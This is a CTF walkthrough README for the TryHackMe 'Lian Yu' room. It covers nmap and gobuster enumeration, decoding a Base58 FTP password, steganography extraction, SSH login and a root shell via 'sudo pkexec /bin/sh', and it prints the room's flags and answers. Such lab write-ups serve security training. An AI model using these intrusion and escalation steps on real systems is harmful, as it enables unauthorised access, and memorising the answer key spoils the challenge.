Skip to content

riyyoo/TryHackMe-Lian_Yu-Walkthrough

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

15 Commits
README.md
README.md
 
 

Repository files navigation

Lian_Yu - TryHackme Writeup Walkthrough

Room link : https://tryhackme.com/room/lianyu

1. Scanning the IP

nmap -sC -sV 10.10.228.22

1

Ports found ---
port 21/tcp - FTP - (vsftpd 3.0.2)
port 22/tcp - SSH - (OpenSSH 6.7p1)
port 80/tcp - HTTP - (Apache httpd)
port 111/tcp - RPC - (rpcbind)

2. Enumeration

Visit the IP

ipvisit

Now run gobuster for hidden Directories.
gobuster dir -u http://10.10.228.22/ -w/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

hidden dr

Found a directory : /island
Now go to the browser and serarch http://10.10.228.22/island

highligj

gottheword

Found out the Code Word by highlighting the page text or viewing the page source.
Code Word -  'vigilante' - (this is our FTP username)
Again run gobuster on /island directory to discover a different directory.
gobuster dir -u http://10.10.228.22/island -w/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

2100

Here we found another directory : /2100 -- (What is the Web Directory you found?)
Now doing the same again go to the browser and serarch http://10.10.228.22/island/2100

pgsource

View the page source --

ticket

Here it says there is a file with a '.ticket' extension.
Now again run gobuster to look for files with a '.ticket' extension.
gobuster dir --url 10.10.228.22/island/2100 --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .ticket

green ticket

Found another director : /green_arrow.ticket -- (what is the file name you found?)
Again going to the browser search http://10.10.228.22/island/2100/green_arrow.ticket.

rty

Seems we found an encryption : 'RTy8yhBQdscX' .  So now lets try to decode it ---

Go to https://gchq.github.io/CyberChef/

Use 'FromBase58' to decode it.

hash

Seems like we have cracked it : '!#th3h00d' - This is the FTP Password. -- (what is the FTP Password?)

3. Now the FTP Login

Now as we have the username and passowrd ---
Username - vigilante
password - !#th3h00d

We can log in to the FTP service -

img files

We got two users: 'vigilante' and 'slade' .
Also found 3 image files in the server. Download them in you system --- Follow the down commands to download the files --

download

Now view the image files and we see that 'Leave.me.alone.png' is not opening.
Also the exiftool shows 'File Format error'

pics exiftool

Checking the header file of the image we found that it is actually wrong there.

change

The correct header -- https://en.wikipedia.org/wiki/Portable_Network_Graphics

correct

Now lets change it --

nowcorrect

Now you can open the image file Here you got a password : 'password'

leaveme

Now lets use steghide to extract any hidden files within the other image files.
steghide extract -sf aa.jpg

extr

Now using the password 'password' we got earlier successfully extracted the .jpg file to a ss.zip file. 
We found a  a 'passwd.txt' and a 'shado file' unzipping the ss.zip file.

m3ta

Now cat 'shado' file and you get a password : 'M3tahuman' -- (ssh password) --- (what is the file name with SSH password?)

mt

4. SSH Login

Now as we have got the ssh password we can now login -- 
User - slade 
password - M3tahuman
ssh slade@10.10.228.22

slade

Now that you're logged in search the user.txt flag --
slade@LianYu:~$ ls
user.txt

user

user.txt - 'THM{P30P7E_K33P_53CRET5__C0MPUT3R5_D0N'T}'

5. Root Privilege Escalation

To find which commands we can run with root privileges we can run: ---
sudo -l

slade2

After running sudo -l , it will again ask for slade password -- use the same password - 'M3tahuman'.


Now You see it says we can run the 'pkexec' with root privileges ---- So now we can run run '/bin/sh' program as root & get the root access.
sudo pkexec /bin/sh

root

root.txt - 'THM{MY_W0RD_I5_MY_B0ND_IF_I_ACC3PT_YOUR_CONTRACT_THEN_IT_WILL_BE_COMPL3TED_OR_I'LL_BE_D34D}'
Submit the flags

What is pkexec vulnerability ?

-- A vulnerability (CVE-2021-4034) in Polkit's pkexec has been weaponized in the wild. This vulnerability is present in the default configuration of all major Linux distributions and can be exploited to gain full root privileges on the system. Red Hat is aware of a vulnerability found in pkexec that allows an authenticated user to perform a privilege escalation attack.

I hope this was helpful.

thanks.

Answer the questions below
Deploy the VM and Start the Enumeration.
--No answer needed

What is the Web Directory you found?
-- 2100

what is the file name you found?
--green_arrow.ticket

what is the FTP Password?
--!#th3h00d

what is the file name with SSH password?
--shado

user.txt
--THM{P30P7E_K33P_53CRET5__C0MPUT3R5_D0N'T}

root.txt
--THM{MY_W0RD_I5_MY_B0ND_IF_I_ACC3PT_YOUR_CONTRACT_THEN_IT_WILL_BE_COMPL3TED_OR_I'LL_BE_D34D}

About

A beginner level security challenge.

tryhackme.com/room/lianyu

Topics

ctf-writeups ctf vulnerabilities cyber-security ctf-challenges pkexec tryhackme tryhackme-writeups

Resources

Readme
Activity

Stars

1 star

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published